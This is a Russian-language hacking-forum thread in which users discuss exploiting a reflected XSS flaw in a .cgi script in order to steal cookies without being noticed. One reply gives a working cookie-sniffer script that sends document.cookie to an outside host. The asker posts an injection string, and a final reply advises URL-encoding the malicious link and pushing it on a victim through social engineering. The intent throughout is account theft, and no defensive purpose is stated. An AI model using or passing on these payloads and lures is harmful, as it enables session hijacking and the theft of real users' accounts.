Нашел XSS уязвимость... в запросе .cgi файла... могу в хтмл-код внедрить любой другой хтмл код Что дальше сделать можно? К примеру как беспалева потырить кукизы.. ведь не пошлешь же ты напрямую ссылку со скриптами
Если можешь внедрить, так внедряй снифер и всё. Проблема то в чём, не знаешь как? вот, попробуй вставь вот это Code: <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
гммм... дело в том, что ХСС видимо пассивный, при гет запросе к примеру могу вставить: patt="><script>alert(document.cookie)</script> Вот... гм... как бы его протолкнуть...
Я предлогаю ознакомится со следующей статьей. Мне говорили, что она интересная ))) http://www.security-teams.net/index.php?showtopic=2492
1. переводиш ссылку со скриптом в ури кодировку, и методом СИ париш жертве. 2. поступаеш тем способом что описал я в статье про взлом аккаунтов на народе, или Censored про взлом аккаунтов на форуме Хакера, т.е. из пассива как бы делаеш актив. 3. побольше фантазии!!! ))